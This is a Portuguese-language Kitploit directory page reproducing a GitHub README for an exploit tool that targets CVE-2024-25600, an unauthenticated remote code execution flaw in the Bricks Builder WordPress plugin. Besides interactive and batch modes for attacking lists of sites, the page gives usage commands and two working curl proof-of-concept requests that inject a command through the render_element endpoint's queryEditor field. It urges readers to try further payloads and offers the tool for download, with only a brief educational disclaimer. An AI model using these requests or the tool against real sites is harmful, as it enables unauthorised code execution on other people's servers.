Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25600-Bricks-Builder-plugin-for-WordPress — Esta ferramenta foi projetada para explorar a vulnerabilidade CVE-2024-25600 encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código sem autenticação em sites afetados. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários. | Kitploit
Ferramentas/GitHubGitHub/tornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubtornad0007/cve-2024-25600-bricks-builder-plugin-for-wordpress

CVE-2024-25600-Bricks-Builder-plugin-for-WordPress

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Esta ferramenta foi projetada para explorar a vulnerabilidade CVE-2024-25600 encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código sem autenticação em sites afetados. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários.

Ver Repositório
9há 2 anosAinda não revisado
Compartilhar

Ferramenta de Exploração CVE-2024-25600 🚀

Descrição 📝

Esta ferramenta 🛠️ foi projetada para explorar a vulnerabilidade CVE-2024-25600 🕳️ encontrada no plugin Bricks Builder para WordPress. A vulnerabilidade permite a execução remota de código não autenticada em sites afetados 💻. A ferramenta automatiza o processo de exploração recuperando nonces e enviando requisições especialmente elaboradas para executar comandos arbitrários.

Recursos 🌟

  • Modo Interativo: Interaja com o site alvo em tempo real 🕹️.
  • Modo Lote: Analise e explore vários sites a partir de uma lista 📋.
  • Execução de Comandos: Execute comandos arbitrários no servidor alvo ⚙️.

Instalação 🛠️

  1. Clone este repositório para sua máquina local 🖥️ usando git clone.
  2. Navegue até o diretório do repositório clonado.
  3. Instale as bibliotecas Python necessárias usando pip install -r requirements.txt.

Uso 📖

Modo Interativo 🎮

  1. Execute a ferramenta com python exploit.py -u <URL> para iniciar o modo interativo.
  2. Siga as instruções na tela para enviar comandos ao servidor alvo.

Modo Lote 📊

  1. Prepare um arquivo de texto com uma lista de URLs alvo.
  2. Execute a ferramenta com python exploit.py -l <file_path> para analisar e explorar os sites listados.

Prova de Conceito (PoC) 📝

O PoC base fornecido pela divulgação é o seguinte:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Atualização: Segundo PoC (mais confiável)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

É possível que payloads adicionais possam gerar melhores resultados. Se o meu exploit ou prova de conceito não funcionar para você, encorajo-o a experimentar payloads alternativos para encontrar uma solução mais eficaz.

Substitua [HOST] pelo site alvo e [NONCE] pelo valor do nonce recuperado do site.

Referência 📖

Para mais informações sobre a vulnerabilidade CVE-2024-25600, consulte a divulgação detalhada em Snicco.io.

Aviso Legal ⚠️

As informações fornecidas neste README são apenas para fins educacionais. Invadir sites ou redes sem autorização é ilegal e antiético. 🚫

Agradecimentos 🙏

Parabéns aos pesquisadores de segurança que descobriram e reportaram esta vulnerabilidade, fornecendo à comunidade informações e ferramentas para ajudar a proteger seus aplicativos web.

Baixar ferramenta